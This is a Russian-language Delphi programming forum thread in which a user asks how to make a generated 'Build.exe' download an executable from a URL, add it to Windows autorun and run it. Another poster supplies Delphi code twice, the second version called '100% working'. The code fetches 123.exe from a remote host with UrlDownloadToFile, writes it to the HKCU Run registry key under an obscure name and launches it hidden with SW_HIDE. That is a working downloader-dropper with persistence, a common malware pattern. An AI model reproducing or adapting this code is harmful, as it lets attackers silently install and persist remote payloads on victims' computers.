Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Delphi программирование > Общие вопросы Delphi
Регистрация

Восстановить пароль

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 08.10.2011, 00:50   #11
Аватар
Старожил
 
Аватар для Аватар
 
Регистрация: 17.11.2010
Сообщений: 18,922
По умолчанию

Понял так: Build.exe скачивает указанный файл с сайта и запускает его на выполнение. Что мешает этому же Build.exe скопировать скачанный файл в папку AppData и прописать его в автозагрузку? Или скачанный файл сам это должен сделать? Если в его коде будет предусмотрена такая возможность, то можно. Не будет - нельзя.
Если бы архитекторы строили здания так, как программисты пишут программы, то первый залетевший дятел разрушил бы цивилизацию
Аватар вне форума Ответить с цитированием
Старый 08.10.2011, 01:07   #12
devote
Пользователь
 
Регистрация: 06.10.2011
Сообщений: 38
По умолчанию

Да, конечно возможно
devote вне форума Ответить с цитированием
Старый 08.10.2011, 01:26   #13
Alex11223
Старожил
 
Аватар для Alex11223
 
Регистрация: 12.01.2011
Сообщений: 19,500
По умолчанию

Цитата:
Что мешает этому же Build.exe скопировать скачанный файл в папку AppData и прописать его в автозагрузку?
Видимо автор спрашивает как это сделать.
Ушел с форума, https://www.programmersforum.rocks, alex.pantec@gmail.com, https://github.com/AlexP11223
ЛС отключены Аларом.
Alex11223 вне форума Ответить с цитированием
Старый 08.10.2011, 17:33   #14
iLnes
Пользователь
 
Регистрация: 07.10.2011
Сообщений: 66
По умолчанию

Да.
Мне надо чтобы Build.exe скопировал этот скачанный файл (123.exe) в AppData и прописал в автозагрузку.
Как реализовать код?
iLnes вне форума Ответить с цитированием
Старый 08.10.2011, 20:12   #15
Cyrix
Пользователь
 
Регистрация: 08.10.2011
Сообщений: 26
По умолчанию

С этим вопросом *наверное не здесь, исходники Довнлоадера лежат в интернете и есть похожие по запросу. Есть исходники Билдера. На форуме HPC в разделе Delphi найдешь все ответы.

З.Ы.
Цитата:
-2 это к чему вообще? Причем тут исходники билдера? //alex11223
iLnes
Цитата:
Запуская я допустим файл Compile_File.exe и ввожу там в поле Edit ссылку такого вида: http://site.com/123.exe , нажимаю "Сделать", в папку с программой, которую я запустим (Compile_File.exe) создается файл Build.exe
Всегда билдер писал для изменения ссылки, alex11223 каким тогда способом можно. Интересно навыки новые получить. Должны -2 объяснить как-то.

Последний раз редактировалось Cyrix; 08.10.2011 в 21:00.
Cyrix вне форума Ответить с цитированием
Старый 08.10.2011, 21:52   #16
Стелс
Я с вами :-)
Форумчанин
 
Аватар для Стелс
 
Регистрация: 19.10.2008
Сообщений: 110
По умолчанию

Код:
uses UrlMon;
.....



function DownloadFile(Source, Dest: string): Boolean;
begin
  try
    Result := UrlDоwnloаdToFile(nil, PChar(Source), PChar(Dest), 0, nil) = 0;
  except
    Result := False;
  end;
end;

TForm1.Button1Click(Sender: TObject);
var
    reg : TRegistry;
begin
  if DownlоadFile('http://www.site.com/123.exe',  'C:\123.exe' ) then
  begin
reg := TRegistry.Create;
reg.RootKey := HKEY_CURRENT_USER;
reg.OpenKey('SOFTWАRE\Microsoft\Windоws\CurrentVersion\Run',True);
reg.WritеString('FF0CA66', 'C:\123.exe);
reg.Free;
WinExec('123.exe',SW_HIDE);
end;
 end.
ну как то вот так наверное или я чего то не понял ٩(๏̯͡๏)۶
٩(๏̯͡๏)۶٩(๏̯͡๏)۶٩(๏̯͡๏)۶ моя любимая книга - Окна for чайников . Кодить начал ещё вчера . ......кто там кодит ? Да не кто не кодит это я куякнулся

Последний раз редактировалось Стелс; 09.10.2011 в 15:50. Причина: ٩(๏̯͡๏)۶
Стелс вне форума Ответить с цитированием
Старый 09.10.2011, 18:44   #17
iLnes
Пользователь
 
Регистрация: 07.10.2011
Сообщений: 66
По умолчанию

Цитата:
Сообщение от Стелс Посмотреть сообщение
Код:
uses UrlMon;
.....



function DownloadFile(Source, Dest: string): Boolean;
begin
  try
    Result := UrlDоwnloаdToFile(nil, PChar(Source), PChar(Dest), 0, nil) = 0;
  except
    Result := False;
  end;
end;

TForm1.Button1Click(Sender: TObject);
var
    reg : TRegistry;
begin
  if DownlоadFile('http://www.site.com/123.exe',  'C:\123.exe' ) then
  begin
reg := TRegistry.Create;
reg.RootKey := HKEY_CURRENT_USER;
reg.OpenKey('SOFTWАRE\Microsoft\Windоws\CurrentVersion\Run',True);
reg.WritеString('FF0CA66', 'C:\123.exe);
reg.Free;
WinExec('123.exe',SW_HIDE);
end;
 end.
ну как то вот так наверное или я чего то не понял ٩(๏̯͡๏)۶
Код не работает, файл не качает.
В автозагрузку естественно тоже.
ссылку на dropbox.com указывал
iLnes вне форума Ответить с цитированием
Старый 09.10.2011, 18:46   #18
Стелс
Я с вами :-)
Форумчанин
 
Аватар для Стелс
 
Регистрация: 19.10.2008
Сообщений: 110
По умолчанию

Цитата:
Сообщение от iLnes Посмотреть сообщение
Код не работает, файл не качает.
В автозагрузку естественно тоже.
ссылку на dropbox.com указывал
код то нужно РУЧКАМИ переписывать )) я проверял у меня все работает
٩(๏̯͡๏)۶٩(๏̯͡๏)۶٩(๏̯͡๏)۶ моя любимая книга - Окна for чайников . Кодить начал ещё вчера . ......кто там кодит ? Да не кто не кодит это я куякнулся
Стелс вне форума Ответить с цитированием
Старый 09.10.2011, 18:53   #19
Стелс
Я с вами :-)
Форумчанин
 
Аватар для Стелс
 
Регистрация: 19.10.2008
Сообщений: 110
По умолчанию

Код:
uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, UrlMon, StdCtrls, Registry;

function DownloadFile(Source, Dest: string): Boolean;
begin
  try
    Result := UrlDownloadToFile(nil, PChar(Source), PChar(Dest), 0, nil) = 0;
  except
    Result := False;
  end;
end;

procedure TForm1.Button1Click(Sender: TObject);
var
       reg : TRegistry;
begin
  if DownloadFile('http://www.site.com/123.exe',  'C:\123.exe')
   then
      begin
          reg := TRegistry.Create;
          reg.RootKey := HKEY_CURRENT_USER;
          reg.OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run',True);
          reg.WriteString('FF0CA66', 'C:\123.exe');
          reg.Free;
WinExec('123.exe',SW_HIDE);
end;
 end;
вот 100% рабочий
٩(๏̯͡๏)۶٩(๏̯͡๏)۶٩(๏̯͡๏)۶ моя любимая книга - Окна for чайников . Кодить начал ещё вчера . ......кто там кодит ? Да не кто не кодит это я куякнулся
Стелс вне форума Ответить с цитированием
Старый 09.10.2011, 18:55   #20
Стелс
Я с вами :-)
Форумчанин
 
Аватар для Стелс
 
Регистрация: 19.10.2008
Сообщений: 110
По умолчанию

можешь просто скопировать
٩(๏̯͡๏)۶٩(๏̯͡๏)۶٩(๏̯͡๏)۶ моя любимая книга - Окна for чайников . Кодить начал ещё вчера . ......кто там кодит ? Да не кто не кодит это я куякнулся
Стелс вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Автозагрузка, каталог "Автозагрузка" создается повторно (Win7 x32) MyIE Общие вопросы Delphi 10 29.03.2012 07:49
Автозагрузка скачанного файла iLnes Assembler - Ассемблер (FASM, MASM, WASM, NASM, GoASM, Gas, RosAsm, HLA) и не рекомендуем TASM 1 08.10.2011 11:31
автозагрузка sevitov_yura Общие вопросы Delphi 14 10.06.2010 12:55
Автозагрузка Altera Операционные системы общие вопросы 8 29.06.2008 21:54
ОБъём скачанного из интернета Kostia Работа с сетью в Delphi 2 23.11.2007 00:25